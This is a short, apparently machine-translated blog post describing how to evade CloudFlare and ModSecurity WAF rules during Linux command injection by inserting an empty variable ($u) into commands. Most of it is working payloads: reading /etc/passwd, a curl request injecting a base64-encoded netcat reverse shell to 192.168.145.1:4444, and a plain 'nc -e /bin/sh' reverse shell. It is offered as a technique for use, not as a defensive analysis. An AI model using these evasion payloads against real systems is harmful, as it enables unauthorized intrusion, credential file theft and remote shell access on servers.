Linux command to bypass the malicious instructions

Others 2019-12-23 21:41:59 views: null

When there is a site command is executed by the linux empty variable $ u to bypass regular WAF match:

Use empty variable $ u, linux is empty there may be variable, direct system is regarded as an empty string, an empty variables will not affect the output, we can take this to bypass filters and pattern matching based on regular expressions.
Tips to bypass the CloudFlare WAF and ModSecurityOWASP CRS3 set of core rules introduced

cat$u /etc$u/passwd$u
curl-s "http://192.168.145.5/test.php?file=&/bin$u/echo$u bmMgLWUgL2Jpbi9zaCAxOTIuMTY4LjE0NS4xIDQ0NDQgICAK|/usr$u/bin$u/base64$u -d|/bin$u/sh$u"

curl-s "http://192.168.145.5/test.php?file=&/bin/ nc -e /bin/sh 192.168.145.1 4444"

Guess you like

Origin www.cnblogs.com/-mo-/p/12088280.html
Recommended
Ranking
[Algorithm] greedy _ program scheduling issues
Spring 控制反转(IOC)
Data structure-6.6 figure
Indicates that the class or member method has abstract properties
Huawei v5 server installed Linux operating system
Postgresql source code analysis - creating ordinary tables
Chapter 10 Evaluation Classification Results
Cloud service Ubuntu 20.04 version uses Nginx to deploy static web pages
Java Exercise 17.1
Solve the problem that git cannot automatically push submission in IDEA Push failed: Failed with error: Could not read from remote repository.
Daily
More
2024-05-09(32)
2024-05-08(18)
2024-05-07(34)
2024-05-06(6)
2024-05-05(0)
2024-05-04(18)
2024-05-03(8)
2024-05-02(0)
2024-05-01(4)
2024-04-30(36)

Code World

© 2018 codetd.com